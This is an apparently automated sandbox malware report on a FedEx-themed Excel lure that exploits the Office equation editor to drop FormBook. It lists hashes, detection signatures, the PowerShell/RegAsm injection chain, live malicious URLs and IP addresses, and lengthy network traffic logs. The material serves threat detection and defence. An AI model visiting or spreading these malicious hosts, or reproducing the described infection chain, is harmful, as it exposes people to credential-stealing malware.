Windows Analysis Report
FedEx Receipt_53065724643.xls

Overview

General Information

Sample name:	FedEx Receipt_53065724643.xls
Analysis ID:	1465865
MD5:	4bb5a21106d460a7e9f63d44e47359cc
SHA1:	bb87ff08d79ebb57f97f97407db083bb13bb580d
SHA256:	adf19fed5bdfe80fc084a7ff1ad2ba59dc986dfe5b7dd7d2864c129bce51c0a0
Tags:	FedExxls
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Microsoft Office launches external ms-search protocol handler (WebDAV)

Multi AV Scanner detection for submitted file

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Sigma detected: Powershell Download and Execute IEX

Snort IDS alert for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

Yara detected Powershell download and execute

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

AI detected suspicious Excel or Word document

Document exploit detected (process start blacklist hit)

Excel sheet contains many unusual embedded objects

Injects a PE file into a foreign processes

Machine Learning detection for sample

Microsoft Office drops suspicious files

Obfuscated command line found

Office drops RTF file

Office equation editor establishes network connection

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Office viewer loads remote template

Shellcode detected

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Equation Editor Network Connection

Sigma detected: Potential PowerShell Command Line Obfuscation

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: Script Initiated Connection to Non-Local Network

Sigma detected: Suspicious Microsoft Office Child Process

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Abnormal high CPU Usage

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to download and execute PE files

Contains functionality to download and launch executables

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Document contains embedded VBA macros

Document embeds suspicious OLE2 link

Document misses a certain OLE stream usually present in this Microsoft Office document type

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Excel Network Connections

Sigma detected: Script Initiated Connection

Sigma detected: Suspicious Office Outbound Connections

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Signatures

AV Detection

Antivirus detection for URL or domain

Source: http://ilang.in/BrlcByX	Avira URL Cloud: Label: malware
Source: http://ilang.in/BrlcB	Avira URL Cloud: Label: malware
Source: http://ilang.in/	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ima.imim.im.imim[1].doc	Avira: detection malicious, Label: HEUR/Rtf.Malformed
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DD4612E1.doc	Avira: detection malicious, Label: HEUR/Rtf.Malformed
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{3A50CEE2-6F27-47C4-9BA8-0FD0C2B7AD90}.tmp	Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen

Multi AV Scanner detection for submitted file

Source: FedEx Receipt_53065724643.xls	Virustotal: Detection: 29%			Perma Link
Source: FedEx Receipt_53065724643.xls	ReversingLabs: Detection: 28%

Yara detected FormBook

Source: Yara match	File source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.572393778.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.572358514.0000000000250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Machine Learning detection for sample

Source: FedEx Receipt_53065724643.xls

Joe Sandbox ML: detected

Exploits

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 23.95.235.16 Port: 80

Jump to behavior

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Windows\SysWOW64\wscript.exe

Jump to behavior

Office Equation Editor has been started

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 194.163.41.117:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49176 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.163.41.117:443 -> 192.168.2.22:49179 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: RunPE.pdb source: powershell.exe, 0000000A.00000002.479671681.00000000062E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.479671681.0000000006221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.473348912.0000000000280000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Shellcode detected

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 7_2_036406FA LoadLibraryW,	7_2_036406FA
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 7_2_036407D9 ShellExecuteW,ExitProcess,	7_2_036407D9
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 7_2_036407AB URLDownloadToFileW,ShellExecuteW,ExitProcess,	7_2_036407AB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 7_2_036407FE ExitProcess,	7_2_036407FE
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 7_2_036407C4 ShellExecuteW,ExitProcess,	7_2_036407C4
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 7_2_03640615 ExitProcess,	7_2_03640615

Suspicious execution chain found

Source: C:\Windows\SysWOW64\wscript.exe	Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Potential document exploit detected (performs DNS queries)

Source: global traffic	DNS query: name: ilang.in
Source: global traffic	DNS query: name: ilang.in
Source: global traffic	DNS query: name: ilang.in
Source: global traffic	DNS query: name: ilang.in
Source: global traffic	DNS query: name: ilang.in
Source: global traffic	DNS query: name: ilang.in
Source: global traffic	DNS query: name: uploaddeimagens.com.br
Source: global traffic	DNS query: name: ilang.in
Source: global traffic	DNS query: name: ilang.in

Potential document exploit detected (performs HTTP gets)

Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 41.216.183.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 194.163.41.117:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 194.163.41.117:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 194.163.41.117:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 194.163.41.117:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 194.163.41.117:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 194.163.41.117:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 194.163.41.117:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 194.163.41.117:443

Potential document exploit detected (unknown TCP traffic)

Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
